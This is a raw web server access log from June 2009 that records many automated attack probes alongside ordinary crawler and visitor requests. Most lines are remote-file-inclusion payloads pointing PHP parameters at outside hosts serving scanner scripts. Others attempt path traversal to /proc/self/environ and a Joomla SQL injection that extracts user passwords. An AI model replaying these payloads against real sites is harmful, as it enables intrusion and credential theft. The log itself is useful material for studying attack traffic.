117.110.57.130 - - [06/Jun/2009:01:08:37 -0400] "GET /logs/access_log.Q109051700////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:08:59 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:01:09:27 -0400] "GET /logs/access_log.Q109051600%20//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Jun/2009:01:09:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.67.146 - - [06/Jun/2009:01:09:48 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:01:10:11 -0400] "GET /logs/error_log.Q109051600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 252 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
218.1.64.133 - - [06/Jun/2009:01:10:12 -0400] "GET /logs/error_log.Q109051600/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
218.1.64.133 - - [06/Jun/2009:01:10:17 -0400] "GET /logs/error_log.Q109051600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 252 "-" "XXXXXX"
218.246.20.221 - - [06/Jun/2009:01:10:23 -0400] "GET /logs/access_log.Q109050700%20%20////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:01:10:23 -0400] "GET /logs/error_log.Q109051600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "XXXXXX"
87.106.67.146 - - [06/Jun/2009:01:11:19 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.67.146 - - [06/Jun/2009:01:11:19 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.67.146 - - [06/Jun/2009:01:11:20 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:01:11:31 -0400] "GET /Includes/ HTTP/1.0" 200 220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.104.71.173 - - [06/Jun/2009:01:12:15 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:12:15 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:12:39 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:12:42 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.103.72.130 - - [06/Jun/2009:01:14:07 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [06/Jun/2009:01:14:07 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.103.72.130 - - [06/Jun/2009:01:14:07 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.103.72.130 - - [06/Jun/2009:01:14:17 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [06/Jun/2009:01:14:17 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.103.72.130 - - [06/Jun/2009:01:14:17 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:14:23 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:01:14:23 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:01:14:23 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:01:14:24 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:01:14:27 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:01:14:27 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:01:14:28 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:01:14:30 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [06/Jun/2009:01:14:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.67.146 - - [06/Jun/2009:01:14:46 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.103.72.130 - - [06/Jun/2009:01:14:59 -0400] "GET /logs/access_log.Q109053000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
87.106.67.146 - - [06/Jun/2009:01:15:00 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.103.72.130 - - [06/Jun/2009:01:15:02 -0400] "GET /logs/access_log.Q109053000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:15:55 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:01:16:49 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:01:16:49 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 200 4373 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:01:16:50 -0400] "GET /logs/access_log.Q109052200%20%20////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:01:17:40 -0400] "GET /logs/access_log.Q109050900%20%20////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:17:57 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:17:59 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:01:19:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.240.40.160 - - [06/Jun/2009:01:23:32 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
24.240.40.160 - - [06/Jun/2009:01:23:32 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
24.240.40.160 - - [06/Jun/2009:01:23:33 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
24.240.40.160 - - [06/Jun/2009:01:23:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
209.59.12.99 - - [06/Jun/2009:01:24:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.112 - - [06/Jun/2009:01:24:46 -0400] "GET /logs/ HTTP/1.0" 200 4366 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.223.3.98 - - [06/Jun/2009:01:25:26 -0400] "GET /show_news.php?cutepath=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:01:25:26 -0400] "GET /logs/show_news.php?cutepath=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:01:25:26 -0400] "GET /logs/access_log.Q109051100/show_news.php?cutepath=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:01:25:30 -0400] "GET /show_news.php?cutepath=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:01:25:30 -0400] "GET /logs/show_news.php?cutepath=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:01:25:30 -0400] "GET /logs/access_log.Q109051100/show_news.php?cutepath=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:25:34 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:25:34 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:25:34 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:25:34 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:01:26:23 -0400] "GET /logs/error_log.Q109052400 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.73.161.62 - - [06/Jun/2009:01:26:27 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:26:27 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:26:27 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:26:33 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:01:27:27 -0400] "GET /logs/error_log.Q109051400/show_news.php?cutepath=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:01:27:49 -0400] "GET /logs/access_log.Q109052900 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [06/Jun/2009:01:27:53 -0400] "GET /logs/error_log.Q109060200 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [06/Jun/2009:01:27:33 -0400] "GET /logs/access_log.Q109060500 HTTP/1.0" 200 3718537 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [06/Jun/2009:01:28:33 -0400] "GET /logs/access_log.Q109060400 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Jun/2009:01:29:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.112 - - [06/Jun/2009:01:29:36 -0400] "GET /logs/access_log.Q109052600 HTTP/1.0" 200 4651429 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [06/Jun/2009:01:30:11 -0400] "GET /logs/error_log.Q109060400 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.73.161.62 - - [06/Jun/2009:01:30:20 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:30:20 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:01:30:43 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.1.64.133 - - [06/Jun/2009:01:30:43 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.1.64.133 - - [06/Jun/2009:01:30:44 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
218.1.64.133 - - [06/Jun/2009:01:30:45 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 259 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:01:30:46 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 259 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:01:30:46 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.1.64.133 - - [06/Jun/2009:01:30:47 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
218.1.64.133 - - [06/Jun/2009:01:30:47 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 232 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:01:30:48 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 232 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:01:30:51 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
218.1.64.133 - - [06/Jun/2009:01:30:52 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 237 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:01:30:53 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237 "-" "XXXXXX"
74.6.8.112 - - [06/Jun/2009:01:30:10 -0400] "GET /logs/access_log.Q109060300 HTTP/1.0" 200 3991095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.246.20.221 - - [06/Jun/2009:01:31:00 -0400] "GET /logs/access_log.Q109051700////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:31:07 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:01:31:12 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
150.70.84.41 - - [06/Jun/2009:01:32:18 -0400] "GET /favicon.ico HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.226.153.1 - - [06/Jun/2009:01:32:20 -0400] "GET /components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.226.153.1 - - [06/Jun/2009:01:32:20 -0400] "GET /logs/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.226.153.1 - - [06/Jun/2009:01:32:21 -0400] "GET /logs/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.226.153.1 - - [06/Jun/2009:01:32:21 -0400] "GET /components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:01:32:57 -0400] "GET /logs/access_log.Q109060200 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [06/Jun/2009:01:33:06 -0400] "GET /logs/access_log.Q107062300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [06/Jun/2009:01:33:19 -0400] "GET /logs/error_log.Q108092200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [06/Jun/2009:01:32:48 -0400] "GET /logs/access_log.Q109051300 HTTP/1.0" 200 5889638 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [06/Jun/2009:01:33:57 -0400] "GET /logs/error_log.Q109060600 HTTP/1.0" 200 106871 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [06/Jun/2009:01:33:57 -0400] "GET /logs/error_log.Q109060600 HTTP/1.0" 200 106871 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.246.20.221 - - [06/Jun/2009:01:34:04 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 200 4373 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:01:34:05 -0400] "GET /logs/access_log.Q109052200////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jun/2009:01:34:05 -0400] "GET /logs/access_log.Q109052200%20%20////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:01:34:20 -0400] "GET /logs/access_log.Q109050900////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jun/2009:01:34:21 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:01:34:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.36.213.166 - - [06/Jun/2009:01:35:36 -0400] "GET /components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
116.36.213.166 - - [06/Jun/2009:01:35:36 -0400] "GET /logs/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
116.36.213.166 - - [06/Jun/2009:01:35:51 -0400] "GET /components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
116.36.213.166 - - [06/Jun/2009:01:35:51 -0400] "GET /logs/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:01:37:37 -0400] "GET /logs/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:01:37:37 -0400] "GET /components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
78.24.219.48 - - [06/Jun/2009:01:39:22 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
209.59.12.99 - - [06/Jun/2009:01:39:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.18.230.192 - - [06/Jun/2009:01:43:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.18.230.192 - - [06/Jun/2009:01:43:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.18.230.192 - - [06/Jun/2009:01:43:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
75.18.230.192 - - [06/Jun/2009:01:43:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
